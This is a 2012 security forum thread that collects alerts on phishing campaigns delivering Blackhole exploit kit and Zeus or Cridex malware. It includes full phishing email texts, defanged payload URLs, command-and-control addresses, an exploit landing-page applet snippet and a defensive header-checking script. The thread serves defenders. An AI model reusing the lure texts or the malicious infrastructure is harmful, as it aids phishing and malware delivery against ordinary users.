SPAM frauds, fakes, and other MALWARE deliveries...
AplusWebMaster
2012-09-01, 17:57
FYI...
Fake MS email phish delivers Zeus via Java vuln ...
- https://isc.sans.edu/diary.html?storyid=14020
Last Updated: 2012-09-01 - "Thanks to Susan Bradley for reporting this to ISC.
We're receiving multiple reports of a phishing campaign using the template from a legitimate Microsoft email regarding Important Changes to Microsoft Services Agreement and Communication Preferences.
The legitimate version of this email is specific to a services agreement seen here*, per a change to Microsoft services as of 27 AUG. The evil version of this email will subject the victim to a hyperlink that will send them to a Blackhole-compromised website, which will in turn deliver a fresh Zeus variant... (evil) email including the following header snippet:
Received: from [101.5.162.236] ([101.5.162.236]) by
inbound94.exchangedefender .com (8.13.8/8.13.1) with ESMTP id q7VFDPjO029166
A legitimate header snippet:
Received: from smtpi.msn .com ([65.55.52.232]) by COL0-MC3-F43.Col0.hotmail.com with Microsoft SMTPSVC(6.0.3790.4900)
101.5.162.236 is in China, 65.55.52.232 is Microsoft. The legitimate email will include a hyperlink for http://email.microsoft.com/Key-9850301.C.DLs15.C.KK.DlNkNK , which points to the above mentioned services agreement.
(Obfuscated to protect the innocent): The phishing mail will instead include a hyperlink to the likes of allseasons****.us, radiothat****.com, and likely a plethora of others. I assessed radiothat****.com and was redirected to 209.x.y.14 which is running the very latest Blackhole evil as described on 28 AUG by Websense in this post**.
Source code review of the web page served included <applet/code="ndshesa.ndshesf"/archive="Leh.jar"><param/nam=123 name=uid value="N013:011:011:04:037:061:061:047:034:076:074:0102:076:074:
047:047:047:074:067:053:061:04:074:04:013:04:075:054:071:034:067:053:
034:034:02:065:071:034"/></applet>
The VirusTotal link for Leh.jar is here(3), and the VirusTotal link for the Zeus variant offered is here(4)...
Contemplate disabling Java(5) until the -next- update(6) is released..."
* http://windows.microsoft.com/en-US/windows-live/microsoft-services-agreement
** http://community.websense.com/blogs/securitylabs/archive/2012/08/28/new-java-0-day-added-to-blackhole-exploit-kit.aspx
3) https://www.virustotal.com/file/2510b99d94446dccacc8809c07f74d0c09b185b5ae68705c8406210148358bc9/analysis/
File name: Leh.jar
Detection ratio: 8/42
Analysis date: 2012-09-01 05:28:51 UTC
4) https://www.virustotal.com/file/98bbe7548b6c51247bd2ef0bcf4f4ac45df9851a3dd9c5ceb5e04b9320c55645/analysis/1346461231/
File name: updateflashplayer.exe
Detection ratio: 6/42
Analysis date: 2012-09-01 01:00:31 UTC
5) http://krebsonsecurity.com/how-to-unplug-java-from-the-browser/
6) https://isc.sans.edu/diary.html?storyid=14017
___
101.5.162.236
101.5.0-255.*
inetnum: 101.5.0.0 - 101.5.255.255
netname: TSINGHUA-CN
country: CN
origin: AS4538
http://www.google.com/safebrowsing/diagnostic?site=AS:4538
... 231 site(s)... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2012-09-02, and the last time suspicious content was found was on 2012-09-02... We found 27 site(s)... that infected 743 other site(s).
___
- https://krebsonsecurity.com/2012/08/java-exploit-leveraged-two-flaws/
"... If you want to test whether you’ve successfully disabled Java, check out Rapid7's page, http://www.isjavaexploitable.com/ ."
:sad: :mad:
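The diary entry above tells the two mails apart by the hand-in hop in the Received: header: a Chinese address for the phish, a Microsoft address for the real notice. The following is an added illustration of that comparison in code; it is not code from the ISC diary or from the forum poster. The two messages are constructed from the quoted snippets (defanged hostnames re-joined), and the table of networks expected for a From: domain is an assumption made for the example, not a published Microsoft range list.

```python
"""Find the hop that handed a message in and compare it with the sender the
From: header claims. Added example, not code from the ISC diary."""
import email
import email.utils
import ipaddress
import re

# Constructed sample messages, modelled on the two Received: snippets quoted
# in the post (defanged hostnames re-joined, header folding as RFC 5322).
PHISH_MSG = """\
Received: from [101.5.162.236] ([101.5.162.236]) by
 inbound94.exchangedefender.com (8.13.8/8.13.1) with ESMTP id q7VFDPjO029166
From: Microsoft <no-reply@microsoft.com>
Subject: Important Changes to Microsoft Services Agreement

(body omitted)
"""

LEGIT_MSG = """\
Received: from smtpi.msn.com ([65.55.52.232]) by COL0-MC3-F43.Col0.hotmail.com
 with Microsoft SMTPSVC(6.0.3790.4900)
From: Microsoft <no-reply@microsoft.com>
Subject: Important Changes to Microsoft Services Agreement

(body omitted)
"""

# Assumption for this example only: the networks a given From: domain is
# expected to hand mail in from. In practice derive this from the brand's
# published SPF record rather than a hard-coded table.
EXPECTED_NETS = {
    "microsoft.com": [ipaddress.ip_network("65.52.0.0/14")],
}

IP_IN_BRACKETS = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")


def originating_hop(msg):
    """Return the earliest Received: header, i.e. the last one in the
    message, because every relay prepends its own. None if there is none."""
    hops = msg.get_all("Received") or []
    return hops[-1] if hops else None


def originating_ip(msg):
    """Extract the connecting IP ([a.b.c.d]) from the earliest Received: hop."""
    hop = originating_hop(msg)
    if hop is None:
        return None
    match = IP_IN_BRACKETS.search(hop)
    return match.group(1) if match else None


def check_sender(raw):
    """Return (from_domain, origin_ip, plausible) for a raw RFC 822 message.
    plausible is True only when the hand-in IP lies in a network we expect
    for the claimed From: domain; unknown domains are never plausible."""
    msg = email.message_from_string(raw)
    _, addr = email.utils.parseaddr(msg.get("From", ""))
    domain = addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""
    ip = originating_ip(msg)
    plausible = False
    if ip and domain in EXPECTED_NETS:
        plausible = any(ipaddress.ip_address(ip) in net
                        for net in EXPECTED_NETS[domain])
    return domain, ip, plausible


if __name__ == "__main__":
    for label, raw in (("phish", PHISH_MSG), ("legit", LEGIT_MSG)):
        print(label, check_sender(raw))
```

One caveat the diary leaves implicit: any Received: line below the one written by your own boundary MTA was supplied by the sender and can be forged, so in production take the hop recorded by your own MX rather than blindly the bottom-most header, and treat the result as a triage signal, not proof.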
AplusWebMaster
2012-09-04, 02:11
FYI...
Fake ‘Amazon order’ email exploits recent Java vuln ...
- http://community.websense.com/blogs/securitylabs/archive/2012/09/03/amazon-order-email-campaign-lead-to-blackhole-utilizing-new-java-vulnerability.aspx
03 Sep 2012 - "... Websense... has detected a new malicious email campaign purporting to be an order verification email from Amazon directing victims to a page containing the recent Java exploit. If successful, this exploit could allow the cyber-criminals behind this campaign to deliver further malicious payloads to the victim’s machine which, for example, could lead to the exfiltration of personal and financial data. Oracle have released an out-of-band patch for this Java vulnerability (Oracle release Java 1.7.0_07 to fix CVE-2012-4681*)... On 1st September, Websense... intercepted over 10,000 malicious emails with the subject ‘You Order With Amazon.com’ enticing the recipient to ‘click here’ to verify a fictitious order as shown in this sample:
> http://community.websense.com/cfs-filesystemfile.ashx/__key/CommunityServer.Components.ImageFileViewer/CommunityServer.Blogs.Components.WeblogFiles.securitylabs/0447.Amazon1_2D00_1.jpg_2D00_550x0.jpg
Once the victim has clicked the link, they are redirected to an obfuscated page hosting the Blackhole Exploit Kit... an analysis of this file can also be found on VirusTotal**..."
* http://community.websense.com/blogs/securitylabs/archive/2012/08/30/oracle-release-java-1-7-0-07-to-fix-cve-2012-4681.aspx
** https://www.virustotal.com/file/2510b99d94446dccacc8809c07f74d0c09b185b5ae68705c8406210148358bc9/analysis/
File name: 9c5abf8889c34b3a36c6699b40ef6717c95ac6e1
Detection ratio: 12/42
Analysis date: 2012-09-03
:mad:
AplusWebMaster
2012-09-04, 15:27
FYI...
Another round of "Spot the Exploit E-Mail"
- https://isc.sans.edu/diary.html?storyid=14029
Last Updated: 2012-09-04 - "We have come to expect quality phishing/fake email work these days...
> https://isc.sans.edu/diaryimages/amexemail1.png
> https://isc.sans.edu/diaryimages/amexemail2.png
> https://isc.sans.edu/diaryimages/amexemail3.png
... javascript will then -redirect- the user to one of these two IP addresses:
96.47.0.163, 108.178.59.26
both IP addresses yield heavily obfuscated javascript. The wepawet analysis can be found here:
- http://wepawet.iseclab.org/view.php?hash=3c550bbf81ebfcd7979f2147fb69729c&type=js
It appears to be the usual "what vulnerable plugin are you running today?" javascript."
___
Fake Google email contains a trojan ...
- http://h-online.com/-1698349
04 Sep 2012 - "Unknown attackers are attempting to persuade email recipients to open attachments that contain a trojan by claiming to be from The Google Accounts Team. A new email supposedly from "accounts-noreply @google .com" with the subject "Suspicious sign in prevented" is being sent en masse -claiming- that a hijacker has attempted to access the mail recipient's Google Account. The message says that the sign-in attempt was prevented but asks users to refer to the attached file for details of the attempted intrusion. However, instead of containing information such as the IP address of the log-in attempt, the attached zip file contains a Windows executable file that will install a trojan onto a victim's system. While Google does sometimes send emails like this to users, they -never- contain attachments; users that receive such an email are advised to delete them. According to VirusTotal*, the trojan is currently only detected by just half of 42 anti-virus programs..."
* https://www.virustotal.com/file/df0b64f5d00af9da8adb4da3f72b559a517631cbd497c0ac03ccf81a256cc23a/analysis/
File name: Google_Accounts_Alert-3944-J5I-4169.zip
Detection ratio: 21/42
Analysis date: 2012-09-04 09:25:32 UTC
___
Fake ‘Wire Transfer Confirmation’ emails lead to Black Hole exploit kit ...
- http://blog.webroot.com/2012/09/04/spamvertised-wire-transfer-confirmation-themed-emails-lead-to-black-hole-exploit-kit/
Sep 4, 2012 - "Over the past 24 hours, cybercriminals started spamvertising millions of emails impersonating the United Parcel Service (UPS) in an attempt to trick end and corporate users into previewing a malicious .html attachment. Upon previewing it, a tiny iFrame attempts to contact a client-side exploit-serving landing URL, courtesy of the Black Hole web malware exploitation kit.
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2012/08/ups_wire_transfer_spam_email_malware_black_hole_exploit_kit.png
... Sample exploits served: CVE-2010-0188; CVE-2010-1885
Upon successful client-side exploitation, the campaign drops MD5: 7fe4d2e52b6f3f22b2f168e8384a757e * ..."
* https://www.virustotal.com/file/932fbd605ffa0dacc765b53236d2b29d34ab69c03c6562bd39dd32c4ef43fd00/analysis/
File name: 7fe4d2e52b6f3f22b2f168e8384a757e
Detection ratio: 32/42
Analysis date: 2012-08-28
___
Fake LinkedIn spam leads to malware ...
- http://blog.dynamoo.com/2012/09/linkedin-spam-1081785926-and.html
4 Sep 2012 - "This fake LinkedIn spam leads to malware on 108.178.59.26 and myasuslaptop .com:
Date: Tue, 04 Sep 2012 10:43:03 +0100
From: "noreply" [noreply@linkedin.com]
Subject: Link LinkedIn Mail
LinkedIn
REMINDERS
Invitation reminders:
• From Charlie Alexander (Mexico Key Account Director at Quanta)
PENDING MESSAGES
• There are a total of 5 messages awaiting your response. Visit your InBox now.
Don't want to receive email notifications? Adjust your message settings.
LinkedIn values your privacy. At no time has LinkedIn made your email address available to any other LinkedIn user without your permission. © 2012, LinkedIn Corporation.
The malicious payload (report here*)..."
* http://wepawet.iseclab.org/view.php?hash=879a57db29da2faa65185b6ce6b9c9ce&t=1346746065&type=js
Detection results
Detector: Jsand 2.3.4 - Result: malicious
In particular, the following URL was found to contain malicious content:
hxxp :// 108.178.59.26 /bv6rcs3v1ithi.php?w=6de4412e62fd13be
Exploits
Name: HPC URL - Description: Help Center URL Validation Vulnerability - Reference: CVE-2010-1885 ...
... My personal preference with any emails purporting to be from LinkedIn is to block them at the perimeter. As far as most businesses are concerned it is simply a playground for recruiters trying to poach your staff."
:mad: :mad:
AplusWebMaster
2012-09-05, 22:14
FYI...
Fake 'QuickBooks Update: Urgent’ emails lead to Black Hole exploit kit
- http://blog.webroot.com/2012/09/05/intuit-themed-quickbooks-update-urgent-emails-lead-to-black-hole-exploit-kit/
Sep 5, 2012 - "... cybercriminals behind the recently profiled ‘Intuit Marketplace’ themed campaign resume impersonating Intuit, with a newly launched round consisting of millions of Intuit themed emails. The theme this time? Convincing users that in order to access QuickBooks they would have to install the non-existent Intuit Security Tool. In reality though, clicking on the links points to a Black Hole exploit kit landing URL that ultimately drops malware on the affected hosts...
Screenshot of a sample spamvertised email:
> https://webrootblog.files.wordpress.com/2012/08/intuit_spam_email_quickbooks_exploits_malware_black_hole_exploit_kit.png
... Client-side exploits serving URL: hxxp ://roadmateremove .org /main.php?page=9bb4aab85fa703f5 - 89.248.231.122; 208.91.197.27
... Name servers part of the campaign’s infrastructure:
ns1.chemrox .net – 208.91.197.27; 173.234.9.17
ns2.chemrox .net – 7.25.179.23
Upon successful client-side exploitation, the campaign drops MD5: f621be555dc94a8a370940c92317d575 * ...
* https://www.virustotal.com/file/eee04e6f165b8cd2fa455403a93f24acda2ff10c18df8e22850b881996338137/analysis/
File name: f621be555dc94a8a370940c92317d575
Detection ratio: 33/42
Analysis date: 2012-09-01
...Once executed, the sample phones back to 87.120.41.155 :8080/mx5/B /in. We’ve already seen the same command and control IP used in the following previously profiled malicious campaigns..."
:mad:
AplusWebMaster
2012-09-06, 15:09
FYI...
Bogus greeting card emails serve exploits and malware
- http://blog.webroot.com/2012/09/06/cybercriminals-resume-spamvertising-bogus-greeeting-cards-serve-exploits-and-malware/
Sep 6, 2012 - "Remember the recently profiled 123greetings .com themed malicious campaign? It appears that over the past 24 hours, the cybercriminals behind it have resumed spamvertising millions of emails pointing to additional compromised URLs in a clear attempt to improve their click-through rates...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2012/09/123greetings_ecards_spam_exploits_malware_black_hole_exploit_kit.png
... Detection rate for a sample JavaScript redirection: MD5: 75e030e741875d29f12b179f2657e5fd* – ... Trojan.JS.Iframe.aby; Trojan.Webkit!html
Upon successful client-side exploitation, the campaign drops MD5: 864e1dec051cbd800ed59f6f91554597** – ... W32/Yakes.AP!tr
Once executed, the malware phones back to 216.38.12.158 :8080/mx/5/B/in... Another domain is known to have been responding to the same IP in the past..."
* https://www.virustotal.com/file/dcb5311abbbe703c457cbf387084a10dc6c022b9cd537fc184c005c32ff64ad2/analysis/1346492654/
File name: greetings.html
Detection ratio: 5/42
Analysis date: 2012-09-01
** https://www.virustotal.com/file/df923eade230bdfbcb0a11700464c5f9d7b9c2435fb99d842a6c8d7f6b0b1ffc/analysis/
File name: 97273d9507c8d78679c8cdf591715760aef0c59c
Detection ratio: 24/42
Analysis date: 2012-09-03
:mad:
AplusWebMaster
2012-09-06, 18:31
FYI...
$100 billion in losses to cybercrime ...
- http://h-online.com/-1701983
6 Sep 2012 - "According to Symantec's 2012 Norton Cybercrime Report*, worldwide, private individuals have suffered approximately $100 billion (more than £69 billion at the current exchange rate) in financial losses as a result of cybercrime. In the period from July 2011 to July 2012, losses averaged $197 (£124) per victim. A total of 556 million adults are reported to have fallen victim to malware, phishing or similar virtual crimes. The report claims that there are 1.5 million victims of cybercrime each day, or about 18 per second. The security specialist's report also states that two-thirds of internet users have been caught out by cybercriminals at some point in their lives, and almost half (46%) were victims during the period covered by the report... Around 40% of people don't use complex passwords or don't change their passwords regularly. There appears to be a clear trend of cybercriminals targeting social networks and mobile devices, with around 20% of users having suffered losses as a result of such attacks. The study also claims that 15% of social media accounts have been compromised and that 10% of users have fallen for fake links and scams on social networks. A total of 75% of those surveyed believe that cybercriminals are increasingly targeting social networking services. Losses within the EU are reported to amount to $16 billion (over £10 billion). China emerges as the country whose citizens have suffered the greatest financial loss – $46 billion (nearly £29 billion) – while Russia has the largest number of victims, with 92% of users surveyed in the country having experienced problems with cybercrime. The report surveyed more than 13,000 online adults aged 18-64 in 24 different countries."
* http://www.symantec.com/about/news/release/article.jsp?prid=20120905_02
Sept. 5, 2012
___
- http://yro.slashdot.org/story/12/09/06/1930218/norton-12-cybercrime-numbers-lower-than-last-years-but-just-as-bad
Sep 6, 2012
> http://blogs.cio.com/security/17375/norton-12-cybercrime-report-magically-makes-278b-damages-disappear
:mad::mad::mad:
AplusWebMaster
2012-09-08, 18:13
FYI...
FedEx spam ...
- http://blog.dynamoo.com/2012/09/fedex-spam-dusharenet-and-gsigallerynet.html
7 Sep 2012 - "Two fake FedEx campaigns... with different payload sites of dushare .net and gsigallery .net. In the first case, the malicious payload is... (report here*) hosted on 203.91.113.6 (G Mobile, Mongolia). In the second case the payload is... (report here**) also hosted on 203.91.113.6..." (More detail at the URL above.)
* http://wepawet.iseclab.org/view.php?hash=94186e5724f1780acc5667b51eea8af3&t=1347043407&type=js
Detector: Jsand 2.3.4 - Result: malicious
** http://wepawet.iseclab.org/view.php?hash=77da84ca6616c3ac4b001f713801007c&t=1347038935&type=js
Detector: Jsand 2.3.4 - Result: malicious
- http://google.com/safebrowsing/diagnostic?site=gsigallery.net/
"Site is listed as suspicious... The last time Google visited this site was on 2012-09-07, and the last time suspicious content was found on this site was on 2012-09-07. Malicious software includes 9 trojan(s), 1 scripting exploit(s)..."
- http://google.com/safebrowsing/diagnostic?site=dushare.net/
"Site is listed as suspicious... The last time Google visited this site was on 2012-09-07, and the last time suspicious content was found on this site was on 2012-09-07. Malicious software includes 2 trojan(s), 1 scripting exploit(s)..."
___
- http://blog.dynamoo.com/2012/09/fedex-spam-studiomonahannet.html
7 Sep 2012 - "... fake FedEx spam leads to malware on studiomonahan .net... The malicious payload is... (report here*) hosted on 206.253.164.43 (Hostigation, US)...
(More detail at the URL above.)
* http://wepawet.iseclab.org/view.php?hash=7e81471e8d284c0170db0388fdb21234&t=1346947943&type=js
Detector: Jsand 2.3.4 - Result: malicious
:mad:
AplusWebMaster
2012-09-09, 15:34
FYI...
Fake BBB email phish/Spam leads to malware
- https://isc.sans.edu/diary.html?storyid=14053
Last Updated: 2012-09-09 - "We received another piece of spam... pretending to be from the Better Business Bureau. Analysis of the file transferred (W6w8sCyj.exe) from prog .it appears to be a piece of malware (Win32/Cridex.Q) used to communicate via SSL with a C&C server... List of domains/IP to watch for and block:
ajaxworkspace .com, prog .it, la-liga .ro, ejbsa .com .ar, technerds .ca, 108.178.59.12
The email looks like this:
Better Business Bureau©
Start With Trust©
Sat, 08 Sep 2012 01:54:02 +0700
RE: Case # 78321602 <hxxp [:]//prog .it/EH564Bf/index.html>
Dear Sirs,
The Better Business Bureau has got the above mentioned complaint from one of your customers concerning their business relations with you. The details of the consumer's concern are contained in attached document. Please give attention to this case and advise us of your opinion as soon as possible. We encourage you to open the COMPLAINT REPORT to answer on this complaint.
We look forward to your prompt response.
Faithfully yours,
Ann Hegley
Dispute Counselor
Better Business Bureau
[1] http://anubis.iseclab.org/?action=result&task_id=15e0c40724f468154b9b07dba8a34bfa4&format=html
[2] http://wepawet.iseclab.org/view.php?hash=b4817d858b4e1862c8a828c85be365b1&t=1347109082&type=js
[3] http://wepawet.iseclab.org/view.php?hash=06ea2fd5b8931844981d7c718ea89060&t=1347109182&type=js
[4] http://wepawet.iseclab.org/view.php?hash=7d629a7fea394ce0be5782de592d8f68&t=1347109422&type=js
[5] https://www.virustotal.com/file/126ea9ed6828a1eaa37250aa015a9f8518fdb54c8175ce87559a68eac47b9187/analysis/
File name: vt_20541851.@
Detection ratio: 3/42
Analysis date: 2012-09-08
[6] http://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=Win32%2fCridex
:mad:
AplusWebMaster
2012-09-13, 16:26
FYI...
Fake US Airways email spam ...
- http://blog.dynamoo.com/2012/09/us-airways-spam-blue-lotusgrovenet.html
11 Sep 2012 - "A couple of samples of a fake US Airways spam email leading to malware on blue-lotusgrove .net:
Date: Tue, 11 Sep 2012 15:32:42 -0300
From: "US Airways - Reservations" [reservations @myusairways .com]
Subject: Please confirm your US Airways online registration...
Date: Tue, 11 Sep 2012 23:29:14 +0700
From: "US Airways - Reservations" [intuitpayroll @e.payroll.intuit .com]
Subject: US Airways online check-in...
The malicious payload is at [donotclick]blue-lotusgrove .net/main.php?page=559e008e5ed98bf7 (report here*) hosted on 203.91.113.6 (G Mobile, Mongolia), the same IP used in this attack**... domains on the same server... can all be considered to be malicious...
(More detail/URL list at the dynamoo URL above.)
* http://wepawet.iseclab.org/view.php?hash=d162970369a8c12845e64d8bbb9a96f1&t=1347388149&type=js
Detector: Jsand 2.3.4 - Result: malicious
** http://blog.dynamoo.com/2012/09/fedex-spam-dusharenet-and-gsigallerynet.html
___
- http://security.intuit.com/alert.php?a=57
Last updated 9/13/2012
:mad:
AplusWebMaster
2012-09-14, 17:04
FYI...
Fake ADP emails, voice mail notifications lead to Blackhole Exploit Kit
- http://community.websense.com/blogs/securitylabs/archive/2012/09/13/voice-mail-notifications-and-adp-emails-lead-to-blackhole-exploit-kit.aspx
13 Sep 2012 - "Since Blackhole Exploit Kit 2.0* was recently introduced, we wanted to give our readers a few examples of how they might get exposed to this threat through email. Websense... has recently intercepted a few malicious email campaigns that try to lure the victims to Web pages that host this popular exploit kit... One posed as voice mail notifications from Microsoft Exchange servers, another mimicked ADP invoice reminders, and a third thanked the recipient for signing up for a premium service of accountingWEB.com... A lot of the email messages pretend to come from trusted sources (well-known establishments, or the victim's own infrastructure), and try to catch the reader off-guard by focusing their attention on something urgent, like money matters... The malicious emails contain links that redirect to Blackhole pages with new obfuscation, but we don't think these are Blackhole 2.0. We suspect it won't be long, though, until we come across similar campaigns that use the new version. ADP is one of the largest names in payroll services... Here's an example marked as high priority, with the subject line "ADP Invoice Reminder":
> http://community.websense.com/cfs-filesystemfile.ashx/__key/CommunityServer.Blogs.Components.WeblogFiles/securitylabs/1854.mal_5F00_ADP_5F00_blur.jpg
... one of the possible redirection paths:
hxxp ://allbarswireless .com/HXwcDdQ/index.html
hxxp ://ash-polynesie .com/AjVSXvus/js.js
hxxp ://108.60.141.7 /tfvsfios6kebvras .php?r=dwtd6xxjpq8tkatb
hxxp ://108.60.141.7 /links/ differently-trace.php ...
Here's a different lure - emails pretending to come from the victim's Exchange server, telling them that they have new voice mail. The text invites the reader to click the link: "Double click on the link to listen the message." Subject lines include "Voice Mail from NNN-NNN-NNNN (NN seconds)":
> http://community.websense.com/cfs-filesystemfile.ashx/__key/CommunityServer.Blogs.Components.WeblogFiles/securitylabs/8015.ma_5F00_voice_5F00_mail_5F00_blur1.jpg
... redirection chain here is similar:
hxxp ://www.tryakbar .com/tLbM3r/index.html
hxxp ://sportmania .so/JP3q2538/js.js
hxxp ://173.255.221.74 /tfvsfios6kebvras .php?r=rs3mwhukafbiamcm ...
Another scheme thanks the user for signing up for a premium service. Subject lines include "Thank you for activating paid services":
> http://community.websense.com/cfs-filesystemfile.ashx/__key/CommunityServer.Blogs.Components.WeblogFiles/securitylabs/6431.mal_5F00_accountingweb_5F00_blur.jpg
Different redirection chain, but the landing page hosts Blackhole, with a very familiar path:
hxxp ://www.svstk. ru/templates/beez/check.php
hxxp ://bode-sales .net/main.php?page=3c23940fb7350489
And finally, the familiar theme of FDIC notifications claiming your wire transfer ability was suspended. Subject lines include "You need a new security version," "Suspended transactions," and "Urgent! You must install a new security version!"
> http://community.websense.com/cfs-filesystemfile.ashx/__key/CommunityServer.Blogs.Components.WeblogFiles/securitylabs/6215.mal_5F00_FDIC_5F00_blur.jpg
Here again, simple redirection leads to typical "/main.php?page=" type URLs.
hxxp ://kahvikuppi .org/achsec.html
hxxp ://afgreenwich .net/main.php?page=0f123fe645ddf8d7
Note that as part of the update to Blackhole 2.0, we are much more likely to see URLs like those used in the first two examples, rather than the latter two, due to the dynamic URL generation capability."
* http://community.websense.com/blogs/securitylabs/archive/2012/09/13/blackhole-exploit-kit-updates-to-2-0.aspx
- https://isc.sans.edu/diary.html?storyid=14098
2012-09-14
ADP spam ...
- http://blog.dynamoo.com/2012/09/adp-spam-4624937122.html
13 Sep 2012 - "... fake ADP spam tries to load malware from 46.249.37.122... After clicking the link bouncing through a couple of redirectors, the victim ends up at [donotclick]46.249.37.122 /links/systems-links_warns.php which appears to be generating a 404 error (although it could be fake). This could be a legitimate but hacked server as it is also the IP address for a proxy service called dutchprox.com. In any case, you might decide you want to block the IP just in case."
- http://www.bbb.org/blog/wp-content/uploads/2012/09/scamalert1.jpg
Sep 12, 2012
___
- http://blog.commtouch.com/cafe/data-and-research/measuring-the-success-of-a-malware-campaign-2/
Sep 13, 2012
:fear::mad:
AplusWebMaster
2012-09-15, 21:45
FYI...
Fake FedEx email invoice leads to BlackHole Exploit kit
- http://blog.webroot.com/2012/09/14/spamvertised-your-fedex-invoice-is-ready-to-be-paid-now-themed-emails-lead-to-black-hole-exploit-kit/
Sep 14, 2012 - "... cybercriminals have launched yet another massive spam run, this time impersonating FedEx in an attempt to trick its customers into clicking on a malware and exploits-serving URL found in the malicious email...
Screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2012/09/fedex_spam_email_malware_exploits_black_hole_exploit_kit.png
... Sample client-side exploits serving URLs: hxxp ://studiomonahan .net/main.php?page=2bfd5695763b6536 (200.42.159.6, AS10481; 206.253.164.43, AS6921); hxxp ://gsigallery .net/main.php?page=2bfd5695763b6536 (208.91.197.54, AS40034)
Sample client-side exploits served: CVE-2010-1885
Detection rate for a sample JavaScript redirector: MD5: 32a74240c7e1a34a2a8ed8749758ef15* ...
JS/Iframe.FR; Trojan-Downloader.JS.Iframe.dbe; JS/Exploit-Blacole.hd
Upon successful client-side exploitation, the campaign drops MD5: f9904f305de002ad5c0ad4b4648d0ca7** ... Trojan.Win32.Obfuscated.aopm; Worm:Win32/Cridex.E
... and MD5: 0e2c968865d34c8570bb69aa6156b915*** Worm.Win32.Cridex.jb
The first sample phones back to 195.111.72.46 :8080/mx/5/B/in/ (AS1955) and to 87.120.41.155 :8080/mx/5/B/in (AS13147), and the second sample initiates DNS queries to droppinlever .pro; lambolp700tuning .ru and it also produces TCP traffic to 146.185.220.32 on port 443, as well as to 192.5.5.241 again on port 443.
... We’ve already seen numerous malicious campaigns phoning back one of these command and control servers, 87.120.41.155 :8080/mx/5/B/in in particular..."
* https://www.virustotal.com/file/ae6b98edb1b77700d28b94e53578a0a9bc2e3c0af12502f32d275c7cf2f32cb0/analysis/1347545788/
File name: Fedex.html
Detection ratio: 8/41
Analysis date: 2012-09-13
** https://www.virustotal.com/file/b4171c1e74779580958e530fc7174f672811d0bba2609050fd46dff2f5229ba0/analysis/
File name: f9904f305de002ad5c0ad4b4648d0ca7.malware
Detection ratio: 30/42
Analysis date: 2012-09-13
*** https://www.virustotal.com/file/cb66311a9af21e383d0b37573a3547cce66d278e0f3b984c150ec51e8c9a4a47/analysis/
File name: a36fc381c480e4e7ee09c89d950195c2
Detection ratio: 24/42
Analysis date: 2012-09-11
:fear: :mad:
AplusWebMaster
2012-09-18, 17:08
FYI...
Multiple fake emails/SPAM lead to malware...
"Photos" Spam...
- http://blog.dynamoo.com/2012/09/photos-spam-diareuomopru.html
18 Sept 2012 14:43 - "This spam leads to malware on diareuomop .ru:
From: Carleen Garrett
Sent: Tuesday, September 18, 2012 3:17:33 PM
Subject: Photos
Hi,
as promised your photos - hxxp ://flyershot .com/gallery.htm
The payload is at [donotclick]diareuomop.ru:8080/forum/links/column.php hosted on the following IPs: 50.56.92.47, 203.80.16.81, 46.51.218.71
These IPs are a subset of the ones found here*. Block 'em if you can."
Fake Intuit email/Spam...
* http://blog.dynamoo.com/2012/09/intuitcom-spam-kerneloffceru.html
17 Sept 2012 22:41 - "This fake Intuit.com spam attempts to load malware from kerneloffce .ru:
Date: Mon, 17 Sep 2012 08:54:50 -0600
From: "Mason Jordan" [LillieRoell@digitalnubia.com]
Subject: Your Intuit.com software order.
Attachments: Intuit_Order_A49436.htm
Dear customer: Thank you for ordering from Intuit Market. We are processing and will message you when your order ships. If you ordered multiple items, we may sned them in more than one delivery (at no extra cost to you) to ensure quicker delivery. If you have questions about your order please call 1-900-130-1601 ($4.79/min).
ORDER INFORMATION
Please download your complete order id #1197744 from the attachment.(Open with Internet Explorer)
2012 Intuit, Inc. All rights reserved. Intuit, the Intuit Logo, Quickbooks, Quicken and TurboTax, among others, are registered trademarks of Intuit Inc.
The malicious payload is at kerneloffce .ru:8080/forum/links/column.php which was hosted on 46.51.218.71 (Amazon, Ireland) until it got nuked..."
> http://google.com/safebrowsing/diagnostic?site=kerneloffce.ru/
"Site is listed as suspicious - visiting this web site may harm your computer... the last time suspicious content was found on this site was on 2012-09-17. Malicious software includes 1 trojan(s)... this site has hosted malicious software over the past 90 days. It infected 4 domain(s)..."
Fake IRS email/Spam...
- http://blog.dynamoo.com/2012/09/irs-spam-virtual-geocachingnet.html
17 Sept 2012 22:30 - "This spam leads to malware on virtual-geocaching .net:
Date: Mon, 17 Sep 2012 11:28:14 -0600
From: Internal Revenue Service [tangierss4 @porterorlin .com]
Subject: IRS report of not approved tax transfer
Your State Tax transfer (ID: 30062091798009), recently sent from your checking account was returned by Internal Revenue Service payment processing unit.
Not Accepted Tax transaction
Tax Transaction ID: 30062091798009
Reason of rejection See details in the report below
Federal Tax Transaction Report tax_report_30062091798009.doc (Microsoft Word Document)
Internal Revenue Service 3192 Aliquam Rd. Davis 71320 VA
The malicious payload is at [donotclick]virtual-geocaching .net/main.php?page=7de3f5c4200c896e (report here) on 203.91.113.6 (G Mobile, Mongolia) as used in this recent attack and several others..."
> http://google.com/safebrowsing/diagnostic?site=virtual-geocaching.net/
"Site is listed as suspicious - visiting this web site may harm your computer... the last time suspicious content was found on this site was on 2012-09-17. Malicious software includes 57 trojan(s), 8 exploit(s), 3 scripting exploit(s)..."
Fake IRS email/Spam...
- http://blog.dynamoo.com/2012/09/irs-spam-thebummwrapnet.html
17 Sept 2012 16:06 - "This fake IRS spam leads to malware on thebummwrap .net:
From: Internal Revenue Service [mailto:fascinatesh07 @deltamar .net]
Sent: 17 September 2012 15:30
Subject: Your federal tax transaction has been not accepted
Your State Tax transaction (ID: 60498447771657), recently initiated from your bank account was canceled by The Electronic Federal Tax Payment System.
Not Accepted Tax transaction
Tax Transaction ID: 60498447771657
Rejection code See details in the report below
Income Tax Transaction Report tax_report_60498447771657.doc (Microsoft Word Document)
Internal Revenue Service Ap #822-9450 Cum Avenue Edmond 33020 MI
The malicious payload is at [donotclick]thebummwrap .net/main.php?page=7de3f5c4200c896e hosted on 203.91.113.6 (G Mobile Mongolia) which has been used several times recently for evil purposes..."
___
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
